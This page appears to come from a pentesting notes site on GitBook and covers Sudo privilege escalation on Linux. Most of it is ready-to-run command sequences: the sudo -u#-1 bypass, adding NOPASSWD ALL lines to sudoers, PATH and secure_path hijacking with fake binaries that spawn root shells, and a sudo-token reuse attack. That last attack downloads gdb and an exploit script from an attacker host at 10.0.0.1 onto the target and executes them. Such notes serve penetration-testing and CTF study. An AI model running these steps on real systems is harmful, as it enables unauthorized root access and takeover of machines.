Linux Privilege Escalation
  • Ansible Playbook Privilege Escalation
  • Apache Conf Privilege Escalation
  • Bash eq Privilege Escalation
  • Buffer Overflow Privilege Escalation
  • Chrome Remote Debugger Pentesting
  • Doas Privilege Escalation
  • Ghidra Debug Mode RCE
  • Gnuplot Privilege Escalation
  • LXC/LXD (Linux Container/Daemon) Privilege Escalation
  • Linux Privilege Escalation
  • Mozilla Pentesting
  • OpenSSL Privilege Escalation
  • Pip Download Code Execution
  • PolKit Privilege Escalation
  • Python Eval Code Execution
  • Python Jails Escape
  • Python Privilege Escalation
  • Python Yaml Privilege Escalation
  • Ruby Privilege Escalation
  • Rust Privilege Escalation
  • SSSD Privilege Escalation
  • Shared Library Hijacking
  • Snapd Privilege Escalation
  • Sudo ClamAV Privilege Escalation
  • Sudo Dstat Privilege Escalation
  • Sudo Exiftool Privilege Escalation
  • Sudo Fail2ban Privilege Escalation
  • Sudo Git Privilege Escalation
  • Sudo Java Privilege Escalation
  • Sudo OpenVPN Privilege Escalation
  • Sudo Path Traversal Privilege Escalation
  • Sudo Privilege Escalation
  • Sudo Privilege Escalation by Overriding Shared Library
  • Sudo Reboot Privilege Escalation
  • Sudo Screen Privilege Escalation
  • Sudo Service Privilege Escalation
  • Sudo Shutdown, Poweroff Privilege Escalation
  • Sudo Systemctl Privilege Escalation
  • Sudo Tee Privilege Escalation
  • Sudo Umount Privilege Escalation
  • Sudo Vim Privilege Escalation
  • Sudo Wall Privilege Escalation
  • Sudo Wget Privilege Escalation
  • Sudoedit Privilege Escalation
  • Tar Wildcard Injection PrivEsc
  • Update-Motd Privilege Escalation
  • irb (Interactive Ruby Shell) Privilege Escalation
  • Linux Backdoors
  • Linux Pivoting
  • Post eploitation
Powered by GitBook
On this page
  • GTFOBins
  • Investigation
  • Edit Sudoers
  • Command Forgery (NOPASSWD)
  • Command Forgery (SETENV, NOPASSWD)
  • Command Path Hijacking
  • Shell in Prompt
  • Reuse Sudo Tokens

Sudo Privilege Escalation

Sudo commands might be vulnerable to privilege escalation (PrivEsc).

PreviousSudo Path Traversal Privilege EscalationNextSudo Privilege Escalation by Overriding Shared Library

Last updated 1 year ago

provides a wide variety of payloads to privilege escalation. So it's recommended to look for in there.

sudo --version
Copied!

If the sudo version <=1.28, try the following command.

sudo -u#-1 /bin/bash
Copied!

sudo su root
sudo -u john whoami
# -s: run shell as target user
sudo -s
Copied!

We may be able to see the commands available as another user.

sudo -l
sudo -ll

# Specify hostname
sudo -h <host-name> -l
# Execute via the hostname
sudo -h <host-name> /bin/bash
Copied!

Also we might see from following files.

cat /etc/sudoers
cat /etc/sudoers.d/usersgroup
Copied!

If we find the following result for sudoers,

(ALL, !root) NOPASSWD: /bin/bash
Copied!

We might be able to get a root shell as follow.

sudo -u#-1 /bin/bash
Copied!

If we have permission to write /etc/sudoers, we can modify this file.

sudo visudo -f /etc/sudoers
Copied!

Now add the following line to allow us to execute all commands as root. Assume we logged in as john.

# Unrestriction
john ALL=(ALL:ALL) ALL
# or
john ALL=(root) NOPASSWD: ALL

# Specific command as root
john ALL=(root) NOPASSWD: /usr/bin/passwd
Copied!

If you are allowed to execute some command, you can forge the contents of the command. First off, check the properties.

sudo -l
(root) NOPASSWD: somecmd
Copied!

If you can confirm that it can be executed as root without password, create the same named command in the arbitrary folder in which you can write files.

# option 1
echo /bin/sh > /tmp/somecmd
Copied!

Next, change the permission for allowing to execute it. And add the path to the environment.

chmod +x /tmp/somecmd
export PATH=/tmp:$PATH
Copied!

Now execute the command as root.

sudo somecmd
whoami
# root
Copied!

If you found there is a SETENV: in sudoers, you can set the PATH when running the command.

sudo -l
(root) SETENV: NOPASSWD: somecmd
Copied!

As the previous section, prepare the payload.

echo '/bin/bash -p' > /tmp/somecmd
chmod +x /tmp/somecmd
Copied!

Now run the command as root with setting the PATH.

sudo PATH=/tmp:$PATH somecmd
whoami
Copied!

sudo -l

env_reset
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

(root) python /home/user/example.py
Copied!

If we can execute some command as root but env_reset and secure_path are set, we cannot override the PATH environment variable. Instead we need to check if we have permission to write each path.

ls -al /usr/local/
ls -al /usr/
ls -al /
Copied!

Assume we can write an arbitrary binary file under /usr/sbin, we can create a payload in there. For example, we create a python binary under /usr/sbin.

echo /bin/bash > /usr/sbin/python
chmod +x /usr/sbin/python
Copied!

Then execute the sudo command.

sudo python /home/user/example.py
Copied!

Now we should get a root shell.

#!/bin/bash

read -p "What's you name: "
Copied!

If we found there is another user’s script which can be executed as root, you can input `/bin/bash -i` to get a shell as another user.

If the current user executes some command using sudo, we might be able to escalate to root privilege. Check if no restriction on ptrace.

cat /proc/sys/kernel/yama/ptrace_scope
0

# We can temporariliy set 0 if we have permissions.
echo 0 | sudo tee /proc/sys/kernel/yama/ptrace_scope
Copied!

If the target system does not have gdb binary, we can download it.

# In local machine, download the debian package.
wget http://fi.archive.ubuntu.com/ubuntu/pool/main/g/gdb/gdb_9.1-0ubuntu1_amd64.deb -O gdb.deb
python3 -m http.server

# In remote machine, download the deb package and extract it.
wget http://10.0.0.1:8000/gdb.deb
dpkg -x gdb.deb ~
Copied!
# In local machine, download the shell script to exploit.
wget https://github.com/nongiach/sudo_inject/blob/master/exploit.sh
python3 -m http.server

# In remote machine, download it and execute.
wget http://10.0.0.1:8000/exploit.sh
sh exploit.sh
Copied!

After that, we can spawn the root shell.

/tmp/activate_sudo_token
sudo su

Reference:

Next, prepare the exploit script from and execute it.

GTFOBins
GTFOBins
Investigation
Version
As Another Users
List Privileges Commands
Edit Sudoers
Command Forgery (NOPASSWD)
Command Forgery (SETENV, NOPASSWD)
Command Path Hijacking
Shell in Prompt
Reuse Sudo Tokens
https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens
the repo
Page cover image